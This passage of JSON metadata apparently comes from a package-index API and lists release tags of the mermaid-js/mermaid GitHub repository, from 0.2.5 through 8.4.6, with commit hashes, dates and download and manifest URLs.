gs/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/me